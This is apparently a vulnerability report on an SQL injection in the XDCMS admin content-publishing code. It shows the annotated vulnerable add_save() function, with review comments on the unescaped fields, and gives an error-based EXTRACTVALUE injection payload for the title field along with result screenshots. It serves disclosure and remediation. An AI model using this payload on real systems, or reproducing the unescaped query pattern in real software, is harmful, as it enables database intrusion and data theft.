### 简要描述:
SQL Injection
### 详细说明:
注入点位于 XDCMS 企业管理系统后台的内容发布处,即 \system\modules\xdcms\content.php 文件:
```
/**
 * Handles the admin "add content" form submission.
 *
 * Reads the item fields from $_POST, inserts a row into the model's main
 * table, inserts the extra fields into the model's content table, updates
 * the sort value and URL, then regenerates static HTML (content page,
 * category lists, index) when the system config and category ask for it.
 * Ends with showmsg(); no value is returned.
 *
 * NOTE(review): the SQL below is built by string interpolation. safe_html()
 * is an HTML filter, not an SQL escaper, and the report shows it can be
 * bypassed; the values therefore reach the query unescaped. The fix is to
 * bind values with prepared statements (or at minimum escape every string
 * value with the database layer's escape function) rather than relying on
 * safe_html(). Column names taken from the client ($fields keys) should be
 * checked against an allow-list of the model's columns.
 */
public function add_save(){
$title=safe_html($_POST['title']);// injection point 1: title. safe_html() is a filter rule set; the report shows it can be bypassed with upper-case input
$commend=intval($_POST['commend']);// cast to int, so safe to interpolate
$username=safe_html($_POST['username']);// injection point 2: username, same upper-case bypass
$thumb=$_POST['thumb'];// raw POST value, no filtering at all, yet interpolated into $sql below
$keywords=safe_html($_POST['keywords']);// injection point 3, same as above
$description=safe_html($_POST['description']);// injection point 4, same as above
$inputtime=datetime();// project helper; assumed to return the current timestamp in the DB's format -- not shown here
$updatetime=strtotime($_POST['updatetime']);// int (or false on parse failure, which the empty() check below rejects)
$url=$_POST['url'];// injection point 5: no safe_html() filtering at all
$catid=intval($_POST['catid']);
$userid=intval($_SESSION['admin_id']);
$fields=$_POST['fields'];// client-supplied array; both its keys and values are used in the second insert below
$style=$_POST['title_color']." ".$_POST['title_weight'];// two raw POST values, also interpolated unescaped into $sql
// Presence check. showmsg() presumably terminates the request; its body is not shown here.
if(empty($title)||empty($catid)||empty($userid)||empty($updatetime)){
showmsg(C('material_not_complete'),'-1');
}
$model=modelname($catid);// model name resolved from the (int) category id
$model_content=get_content_table($model);
if(empty($model)){
showmsg(C('error'),'-1');
}
$table=$this->mysql->show_table(); // check that the data table exists (non-strict in_array; fine for a list of table-name strings)
if(!in_array(DB_PRE.$model,$table)){
showmsg(C('table_not_exist'),'-1');
}
// Insert the content row. This statement carries the five injected fields above (plus $thumb and $style)
// into the query text with no SQL escaping at all -- this is the vulnerable query.
$sql="insert into ".DB_PRE.$model."(title,commend,username,thumb,keywords,description,inputtime,updatetime,url,catid,userid,hits,style) values('{$title}','{$commend}','{$username}','{$thumb}','{$keywords}','{$description}','{$inputtime}','{$updatetime}','{$url}','{$catid}','{$userid}',0,'{$style}')";
$this->mysql->query($sql);
$last_id=$this->mysql->insert_id();
// Update the sort value to the new row's id.
$this->mysql->db_update($model,"`sort`='".$last_id."'","`id`=".$last_id);
// Build the insert for the extra-field (content) table.
$sql_fields='`id`';
$sql_value=$last_id;
if(!empty($_POST['uploadtype'])){ // multi-image upload present?
$upload_array=$this->upload_more('morefile');
$uploadtype=$_POST['uploadtype'];// raw POST value used as a $fields key, i.e. as a column name below
$fields[$uploadtype]=serialize(array_clear($upload_array));
}
// NOTE(review): $key comes straight from the client array and is placed inside backticks without
// escaping or validation; it should be restricted to the model's known column names.
foreach($fields as $key=>$value){
$sql_fields.=",`".$key."`";
if(is_array($value)){
// Array values are flattened to a trailing-comma separated string.
$value_arr='';
foreach($value as $k=>$v){
$value_arr.=$v.',';
}
$value=$value_arr;
}
$sql_value.=",'".addslashes($value)."'";// values here ARE escaped (addslashes), unlike the first insert above
}
$query=$this->mysql->query("insert into ".DB_PRE.$model_content."({$sql_fields}) values ({$sql_value})");
if(!$query){
// Roll back the main-table row by hand if the content-table insert failed.
$this->mysql->db_delete($model,"`id`=".$last_id);
showmsg(C('insert_table_error'),'-1');
}
// Static page generation.
$config=base::load_cache("cache_set_config","_config");
$config_html=$config['createhtml']; // system-wide "generate html" setting from the config cache
$array=get_category($catid);
$ishtml=$array['is_html']; // whether this category is set to generate html
// Only "http://" is treated as an external link; anything else (including "https://") is
// overwritten with a generated internal url and gets a content page.
if(substr($url,0,7)!="http://"){
if($model=='single'){
$url=$array['url']; // single-page model: reuse the category url directly
}else{
$url=$this->ob_url->conurl($catid,$last_id,$ishtml,$inputtime);
}
$this->mysql->db_update($model,"`url`='".$url."'","`id`=".$last_id); // store the generated url
if($config_html==1&&$ishtml==1){
if($model=='single'){
$url=$url."index.html";
}
$this->html->creat_show($catid,$last_id,$url,$array['lang']); // generate the content html page
}
}
if($config_html==1&&$ishtml==1){
$parent=is_parent($catid);
$parent_id=explode(",",ltrim($parent,","));
if(count(array_filter($parent_id))!=0){ // does the category have parents?
foreach($parent_id as $value){
$parent_cat=get_category($value); // parent category's url
$this->html->creat_list($value,"",$parent_cat['url']."index.html",$parent_cat['lang']); // regenerate the parent category page
$this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); // regenerate the current category page (repeated once per parent)
}
}else{
$this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); // no parents: only the first page of the current category list is generated, to keep the load down
}
}
if($config_html==1){ // if html generation is enabled, regenerate the site index
$lang=get_lang($array['lang']);
$this->html->creat_index($array['lang'],$lang['dir']);
}
showmsg(C('add_success'),'-1');
}
```
### 漏洞证明:
以第一处title字段为例
首先发布一个内容:
[<img src="https://images.seebug.org/upload/201402/180907217b139f07ea9afc9ce208671a38bb35ca.jpg" alt="x.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/180907217b139f07ea9afc9ce208671a38bb35ca.jpg)
上面的title字段插入exp
```
' AND EXTRACTVALUE(7028,CONCAT(0x5c,0x7177786771,(SELECT (CASE WHEN (7028=7028) THEN 1 ELSE 0 END)),0x71706b6b71)) AND 'PAKz'='PAKz
```
最后看看结果
[<img src="https://images.seebug.org/upload/201402/180936357f126dd7796a356750aae82cfd1aaf97.jpg" alt="x1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/180936357f126dd7796a356750aae82cfd1aaf97.jpg)